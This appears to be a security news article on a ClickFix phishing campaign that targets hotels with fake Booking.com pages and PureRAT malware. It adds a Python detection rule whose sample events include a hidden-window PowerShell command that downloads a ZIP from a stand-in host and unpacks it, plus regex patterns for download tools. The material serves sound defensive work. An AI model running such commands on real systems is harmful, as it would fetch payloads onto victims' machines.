Large-scale Clickfix Phishing Attacks Target Hotel Systems With...
Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvests their credentials by deploying malware like PureRAT.
"The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT."
The end goal of the campaign is to steal credentials from compromised systems that grant threat actors unauthorized access to booking platforms like Booking.com or Expedia; these credentials are then either sold on cybercrime forums or used to send fraudulent emails that defraud hotel customers.
The activity is assessed to have been active since at least April 2025 and was still operational as of early October 2025. It is one of several campaigns that have been observed targeting the sector, including a set of attacks documented by Microsoft earlier this March.
In the latest wave analyzed by the French cybersecurity company, email messages are sent from a compromised email account to several hotels across multiple countries, tricking recipients into clicking on bogus links that trigger a redirection chain to a ClickFix page with a supposed reCAPTCHA challenge to "ensure the security of your connection."
"Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe," Sekoia explained. "The objective is to redirect the user to the same URL but over HTTP."
This causes the victim to copy and execute a malicious PowerShell command that gathers system information and downloads a ZIP archive, which, in turn, contains a binary that ultimately sets up persistence and loads PureRAT (aka zgRAT) by means of DLL side-loading.
The modular malware supports a wide range of features, such as remote access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries. It is also protected by .NET Reactor to complicate reverse engineering, and it establishes persistence on the host by creating a Run registry key.
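The infection chain above (a pasted PowerShell one-liner run from the desktop shell that downloads a ZIP archive, followed by a Run-key write for persistence) is the kind of sequence a detection rule can key on. The following is an added example written for this article, not code from Sekoia or the campaign; the event records, host names and command lines are constructed, and the field layout is a simplified stand-in for Sysmon-style process-creation and registry events.

```python
"""Added detection example: correlate a ClickFix-style PowerShell launch with a
later Run-key write on the same host. Events below are constructed samples."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process" (creation) or "registry" (value set)
    host: str
    parent: str = ""   # parent image, process events only
    image: str = ""    # process image, process events only
    cmdline: str = ""  # command line, process events only
    target: str = ""   # registry path, registry events only


RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
DOWNLOAD = re.compile(r"(Invoke-WebRequest|iwr|DownloadString|DownloadFile|curl)\b", re.I)
ARCHIVE = re.compile(r"Expand-Archive|\.zip\b", re.I)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}  # where a user-pasted command runs from


def is_clickfix_launch(e: Event) -> bool:
    """PowerShell spawned by the desktop shell that fetches and unpacks an archive."""
    return (e.kind == "process"
            and e.image.lower().endswith("powershell.exe")
            and e.parent.lower() in INTERACTIVE_PARENTS
            and DOWNLOAD.search(e.cmdline) is not None
            and ARCHIVE.search(e.cmdline) is not None)


def is_run_key_persistence(e: Event) -> bool:
    return e.kind == "registry" and RUN_KEY.search(e.target) is not None


def find_clickfix_chains(events) -> list:
    """Hosts where a ClickFix-style launch is followed by a Run-key write (in event order)."""
    launched, flagged = set(), []
    for e in events:
        if is_clickfix_launch(e):
            launched.add(e.host)
        elif is_run_key_persistence(e) and e.host in launched and e.host not in flagged:
            flagged.append(e.host)
    return flagged


SAMPLE_EVENTS = [  # constructed, not indicators from the campaign
    Event("process", "FRONTDESK-01", parent="explorer.exe", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell -w hidden -c \"iwr http://example.invalid/a.zip -OutFile $env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip\""),
    Event("registry", "FRONTDESK-01", target=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("process", "ADMIN-02", parent="services.exe", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline="powershell -File C:\\scripts\\backup.ps1"),  # scheduled admin script, benign
    Event("registry", "ADMIN-02", target=r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"),
]

if __name__ == "__main__":
    print(find_clickfix_chains(SAMPLE_EVENTS))  # ['FRONTDESK-01']
```

The Run-key write alone is noisy (legitimate software creates them too); the rule only raises it once the same host has already shown the user-launched download-and-unpack pattern.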
Furthermore, the campaign has been found to approach hotel customers via Whats
Source: The Hacker News